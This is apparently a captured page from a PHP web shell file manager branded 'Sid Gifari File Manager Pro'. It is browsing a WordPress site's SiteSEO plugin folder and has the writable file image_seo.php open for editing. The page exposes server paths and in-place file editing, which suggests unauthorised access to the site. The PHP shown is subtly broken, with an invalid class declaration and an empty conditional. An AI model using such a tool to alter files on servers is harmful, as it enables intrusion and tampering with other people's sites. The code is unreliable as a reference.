🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-14 09:04:08 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
momotimes.therahuldas.com
/
wp-content
/
plugins
/
siteseo
/
main
📍 /home/therahul/momotimes.therahuldas.com/wp-content/plugins/siteseo/main
🔄 Refresh
✏️
Editing: image_seo.php
Writable
<?php /* * SITESEO * https://siteseo.io * (c) SiteSEO Team */ namespace SiteSEO; if(!defined('ABSPATH')){ die('Hacking Attempt !'); } class Image_seo(){ static function tags(){ global $siteseo; if(empty($siteseo->setting_enabled['toggle-advanced'])){ return; } if($siteseo->advanced_settings['attachment']){ } } }
💾 Save Changes
❌ Cancel